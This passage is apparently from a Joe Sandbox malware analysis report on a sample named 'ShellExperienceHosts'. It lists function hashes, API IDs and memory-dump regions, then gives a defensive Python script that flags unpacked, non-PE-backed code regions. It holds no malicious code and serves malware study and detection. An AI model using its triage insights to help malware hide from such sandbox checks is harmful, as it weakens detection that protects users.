                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExtensionFileFindModuleNamePath
                                                                            • String ID: %Ts%Ts.dll
                                                                            • API String ID: 2295281026-1896370695
                                                                            • Opcode ID: d75e7ba6eaffcfd2d11c610c3096e0ab7468ff5f6589ebc46b3ee5300674410a
                                                                            • Instruction ID: 5798653099e6212fe223acef607565871d7a98ef9a8feb61ed11308002ba059a
                                                                            • Opcode Fuzzy Hash: d75e7ba6eaffcfd2d11c610c3096e0ab7468ff5f6589ebc46b3ee5300674410a
                                                                            • Instruction Fuzzy Hash: CD31F731706115ABCB11AAB8D988AFBB7ACAF4D318B150167F415D7A40DBA0E805C7D4
                                                                            APIs
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C862D7C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ___except_validate_context_record
                                                                            • String ID: csm$csm
                                                                            • API String ID: 3493665558-3733052814
                                                                            • Opcode ID: 6ad89dd06cec5040c114d10119546ecb84d4f4c2c219eeb3924d00ec0a79cacb
                                                                            • Instruction ID: a855100a71cabf50ee68dcf3d173112205b4486daba49d593fc307e2451b1e28
                                                                            • Opcode Fuzzy Hash: 6ad89dd06cec5040c114d10119546ecb84d4f4c2c219eeb3924d00ec0a79cacb
                                                                            • Instruction Fuzzy Hash: 62310876500208ABCF324F56CE4899A3B65FF05759B1849E9FC140DD12C33BD861CB81
                                                                            APIs
                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C6C4CB5
                                                                              • Part of subcall function 6C6C12E2: std::_Lockit::_Lockit.LIBCPMT ref: 6C6C142F
                                                                              • Part of subcall function 6C6C12E2: std::_Lockit::~_Lockit.LIBCPMT ref: 6C6C144A
                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C6C4D27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                            • String ID: sJll
                                                                            • API String ID: 593203224-2827997600
                                                                            • Opcode ID: 2765d93277fd8e851c05994372c5a54092252c06d0f1d8006a586f2579d92ad3
                                                                            • Instruction ID: 54b2e4c23c78f367f1af70513600a8cd65bf4e7fc7c52d387b99d6afa42816e7
                                                                            • Opcode Fuzzy Hash: 2765d93277fd8e851c05994372c5a54092252c06d0f1d8006a586f2579d92ad3
                                                                            • Instruction Fuzzy Hash: E22191B1E002088FCB10DFA8D944AEDB7F4FF09718F104569E819A7790E735A944CBA5
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyHeap
                                                                            • String ID: fI$fI
                                                                            • API String ID: 2435110975-2386055794
                                                                            • Opcode ID: bdc97b96a3807c9266f3fe4090c2a4bc76fdaafa984d6d893863179511533786
                                                                            • Instruction ID: 56057d1187cf719baf002346cee3f3a313ad225b11a255a7744d71810006c148
                                                                            • Opcode Fuzzy Hash: bdc97b96a3807c9266f3fe4090c2a4bc76fdaafa984d6d893863179511533786
                                                                            • Instruction Fuzzy Hash: AB21A57860C250DFCB929F49D4897097BF0AB56319F584D5AE580EB720C332E8E0CB97
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EnableWindow
                                                                            • String ID: SMn$$TMn$
                                                                            • API String ID: 4266128931-2548786147
                                                                            • Opcode ID: 4fe231984b077b7dad2e8300571f0753f3ce6a16a71e068e0c64f8d0e0bbc3aa
                                                                            • Instruction ID: 3548ce9138cd0fca695d82d499a5c773796d5c3c3ab85d9390710caf461fe8b6
                                                                            • Opcode Fuzzy Hash: 4fe231984b077b7dad2e8300571f0753f3ce6a16a71e068e0c64f8d0e0bbc3aa
                                                                            • Instruction Fuzzy Hash: F0214975219200DFC6199F1DC480849B7FAEF8A314F144A1EE598EB720E235EC21CB1B
                                                                            APIs
                                                                            • LoadIconW.USER32(?,?), ref: 6C744844
                                                                            • GetClassInfoW.USER32(?,00000000,'@ol), ref: 6C744893
                                                                              • Part of subcall function 6C73D5E6: __snprintf_s.LIBCMT ref: 6C73D632
                                                                              • Part of subcall function 6C73D5E6: GetClassInfoW.USER32(?,0000007C,?), ref: 6C73D696
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ClassInfo$IconLoad__snprintf_s
                                                                            • String ID: '@ol
                                                                            • API String ID: 247674639-3394936640
                                                                            • Opcode ID: 69921ea17cf9e1183f5fd768d60694129a64fd0e2b5d3733f49dc2dd5b86bd3c
                                                                            • Instruction ID: e27b0bae230e75777e92faf53afdabf02d2bea7b16d70dcd0aba063e0ee1bd10
                                                                            • Opcode Fuzzy Hash: 69921ea17cf9e1183f5fd768d60694129a64fd0e2b5d3733f49dc2dd5b86bd3c
                                                                            • Instruction Fuzzy Hash: 0E117035A00658AFDB019FE5D948EEEBBB8AF48718F104039F901A7654DB30D944DBA0
                                                                            APIs
                                                                            • __output_l.LIBCMT ref: 02236FFC
                                                                              • Part of subcall function 022370E4: __getptd_noexit.LIBCMT ref: 022370E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__output_l
                                                                            • String ID: B
                                                                            • API String ID: 2141734944-1255198513
                                                                            • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                            • Instruction ID: 2d0bf3c565865c4d4afde1d4d7747354eff1402ad56c81c2cbaf84e4d6630e88
                                                                            • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                            • Instruction Fuzzy Hash: 3A016DB291424EABDF129FE4CC01BEEBBF9FB04364F004156F924A6284E7749501CBA5
                                                                            APIs
                                                                            • __output_l.LIBCMT ref: 031AF1D4
                                                                              • Part of subcall function 031AF2DA: __getptd_noexit.LIBCMT ref: 031AF2DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__output_l
                                                                            • String ID: B
                                                                            • API String ID: 2141734944-1255198513
                                                                            • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                            • Instruction ID: 0ba887411851879ad96e6f89b2ed08bcd19031e41d9a7cba2d91ec5190050325
                                                                            • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                            • Instruction Fuzzy Hash: 1D016D75E00249ABDF10DFA8CC41AEEBBB8FB08365F144125E824AA280D7749502CBA1
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CallFrame@12Setting__getptd
                                                                            • String ID: j
                                                                            • API String ID: 3454690891-2137352139
                                                                            • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                            • Instruction ID: 4265ed27aa2a05235c1775b86741acd3d7ce082d675ae58b5082f51741cf379e
                                                                            • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                            • Instruction Fuzzy Hash: 9A118071C24265EFCB16EF98C4443ECBB71BF01728FA480C9D4552B586CBB56991CF91
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 022437AF
                                                                              • Part of subcall function 022398E6: __getptd_noexit.LIBCMT ref: 022398E9
                                                                              • Part of subcall function 022398E6: __amsg_exit.LIBCMT ref: 022398F6
                                                                            • __getptd.LIBCMT ref: 022437BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction ID: a5d9bbcaeae0b0cf5b960fad7c1818a38d1c69694ec9a70b6b84a7322fedcf1e
                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction Fuzzy Hash: 0B016D75820306CBCF3EEFA1C444AACB3B6BF04215FB488ADD45196254DF708980DF51
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 031C00A2
                                                                              • Part of subcall function 031B381A: __getptd_noexit.LIBCMT ref: 031B381D
                                                                              • Part of subcall function 031B381A: __amsg_exit.LIBCMT ref: 031B382A
                                                                            • __getptd.LIBCMT ref: 031C00B0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                            • Instruction ID: af4b9e2ed016fd0f1ecf72d5ac46aed9fe1de68c92f9aa2088d8028e9d5d1023
                                                                            • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                            • Instruction Fuzzy Hash: 79014B38910345CBCF38DF65C8406ADF7B9AF2C215F58856ED0C1AA650CF34D9A5CB01
                                                                            APIs
                                                                              • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132B4
                                                                              • Part of subcall function 100132AE: __getptd.LIBCMT ref: 100132C4
                                                                            • __getptd.LIBCMT ref: 100137D8
                                                                              • Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
                                                                              • Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F
                                                                            • __getptd.LIBCMT ref: 100137E6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                             • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                            • String ID: csm
                                                                            • API String ID: 803148776-1018135373
                                                                            • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction ID: 7ab74b7057de6af6c41b09604486a57fd509075c87a44dfcf8772f30d13ae725
                                                                            • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                            • Instruction Fuzzy Hash: 2001283A8013468FDB24DF26C44069CB3F6FF00651F51842DF4955A6A1CF34EAD1CA11
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C774D64
                                                                            • FindResourceW.KERNEL32(?,?,STYLE_XML,?,00000000,00000004,6C6D45E3,00000002,00000000,00000003,00000001,?,?,00000000,00000000,0000007E), ref: 6C774DA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                             • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                             • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: FindH_prolog3Resource
                                                                            • String ID: STYLE_XML
                                                                            • API String ID: 3036663282-3909253476
                                                                            • Opcode ID: c843a75dfe5b9dc27caf4a401da6b9babb1f359ca3004d4c1e548d4115d88471
                                                                            • Instruction ID: 6d335b7d5a30868170fc8e8521d3ef405f8966ea90b31f6c8bbd3110c4bbef89
                                                                            • Opcode Fuzzy Hash: c843a75dfe5b9dc27caf4a401da6b9babb1f359ca3004d4c1e548d4115d88471
                                                                            • Instruction Fuzzy Hash: 2BF0A475A001189B9F20ABA18F4C9AEB27CFF4A35AB044536E26197A40C730C805EFB1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3541485259.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                             • Associated: 00000003.00000002.3541444131.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                             • Associated: 00000003.00000002.3541539736.000000000040C000.00000002.00000001.01000000.00000005.sdmp
                                                                             • Associated: 00000003.00000002.3541539736.0000000000414000.00000002.00000001.01000000.00000005.sdmp
                                                                             • Associated: 00000003.00000002.3541539736.0000000000456000.00000002.00000001.01000000.00000005.sdmp
                                                                             • Associated: 00000003.00000002.3541795510.000000000049F000.00000040.00000001.01000000.00000005.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: h3A$l3A$p3A$t3A
                                                                            • API String ID: 0-422395243
                                                                            • Opcode ID: 323ff9953e1600890f904706cadf687cbd5e63ac7881b1e7a3b936ad8b4e984c
                                                                            • Instruction ID: 0d0a6c218b558ce51a144ca132cdf3fd2609f9de01a02927fca728c9dddb9a1a
                                                                            • Opcode Fuzzy Hash: 323ff9953e1600890f904706cadf687cbd5e63ac7881b1e7a3b936ad8b4e984c
                                                                            • Instruction Fuzzy Hash: 59E0B632A9C50E268A158DBC210C4663A8CD291719B084173B45CEEFA4D92AEF90D08D
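The records above are the report's per-function similarity entries, and two things in them matter for triage: several functions were dumped from regions at 02230000 and 031A0000 that are "based on PE: false" (code that exists only in memory, not in any module on disk), and the same Opcode ID f0e1e453... appears both in the 02230000 region and in the PE-backed module at 10000000, so the in-memory blob carries the same compiled MSVC CRT `csm` handler as a loaded module. The Python below is an added example, not Joe Sandbox's own tooling: it parses this record format and groups functions by region and by Opcode ID. The sample text is constructed from records in this section, trimmed to the fields the parser reads. Treating the fifth dotted component of the dump name as the Win32 PAGE_* protection value (0x40 = PAGE_EXECUTE_READWRITE, 0x20 = PAGE_EXECUTE_READ) is an assumption that this page does not document.

```python
import re
from collections import defaultdict

# Constructed sample: four records from this report section, trimmed to the
# fields the parser reads. Real reports carry more bullet lines per record;
# the parser ignores the ones it does not know.
SAMPLE = """\
APIs
• __output_l.LIBCMT ref: 02236FFC
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
• API ID: __getptd_noexit__output_l
• String ID: B
• Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
• Instruction Fuzzy Hash: 3A016DB291424EABDF129FE4CC01BEEBBF9FB04364F004156F924A6284E7749501CBA5
APIs
• __getptd.LIBCMT ref: 022437AF
Memory Dump Source
• Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
• Instruction Fuzzy Hash: 0B016D75820306CBCF3EEFA1C444AACB3B6BF04215FB488ADD45196254DF708980DF51
APIs
• __getptd.LIBCMT ref: 031C00A2
Memory Dump Source
• Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
• Instruction Fuzzy Hash: 79014B38910345CBCF38DF65C8406ADF7B9AF2C215F58856ED0C1AA650CF34D9A5CB01
APIs
• __getptd.LIBCMT ref: 100137D8
Memory Dump Source
• Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• API ID: __getptd$__amsg_exit__getptd_noexit
• String ID: csm
• Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
• Instruction Fuzzy Hash: 2001283A8013468FDB24DF26C44069CB3F6FF00651F51842DF4955A6A1CF34EAD1CA11
"""

FIELD = re.compile(r"^\s*•\s*(Source File|API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*?)\s*$")
SOURCE = re.compile(r"^(?P<dump>\S+\.sdmp), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


def parse_records(text):
    """One dict per function; a record closes at its Instruction Fuzzy Hash line."""
    records, cur = [], {}
    for line in text.splitlines():
        m = FIELD.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "Source File":
            s = SOURCE.match(value)
            if s is None:
                raise ValueError(f"unrecognised Source File line: {value!r}")
            cur["dump"] = s["dump"]
            cur["offset"] = int(s["offset"], 16)
            cur["based_on_pe"] = s["pe"] == "true"
            # Assumption: the fifth dotted component of the dump name is the
            # Win32 PAGE_* protection of the region (0x40 = PAGE_EXECUTE_READWRITE).
            cur["protect"] = int(s["dump"].split(".")[4], 16)
        elif key == "Instruction Fuzzy Hash":
            cur["instruction_fuzzy_hash"] = value
            records.append(cur)
            cur = {}
        else:
            cur[key.lower().replace(" ", "_")] = value
    return records


def non_pe_regions(records):
    """Base offsets of regions not backed by a PE on disk: where unpacked code was dumped from."""
    return sorted({r["offset"] for r in records if not r["based_on_pe"]})


def rwx_regions(records):
    """Base offsets whose dump name carries PAGE_EXECUTE_READWRITE (under the protection assumption)."""
    return sorted({r["offset"] for r in records if r["protect"] == 0x40})


def shared_opcode_ids(records):
    """Opcode IDs seen in more than one region, each mapped to the regions it appears in.

    A match between a non-PE region and a PE-backed module means the unpacked
    blob contains the same compiled function as a known module, which helps
    attribute the blob (here: the MSVC CRT 'csm' handler)."""
    seen = defaultdict(set)
    for r in records:
        if r.get("opcode_id"):
            seen[r["opcode_id"]].add(r["offset"])
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


def functions_in(records, offset):
    """(API ID, String ID) pairs for every function dumped from the given region."""
    return [(r["api_id"], r["string_id"]) for r in records if r["offset"] == offset]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for off in non_pe_regions(recs):
        print(f"non-PE region {off:#010x}: {functions_in(recs, off)}")
    for oid, offs in shared_opcode_ids(recs).items():
        print(f"opcode {oid[:12]}... shared by {[f'{o:#010x}' for o in offs]}")
```

Feed the full function list from a report to `parse_records` and the non-PE regions it returns are the ones worth carving and scanning first; the Opcode ID overlaps then tell you which of their functions are just statically linked CRT and which are the sample's own code.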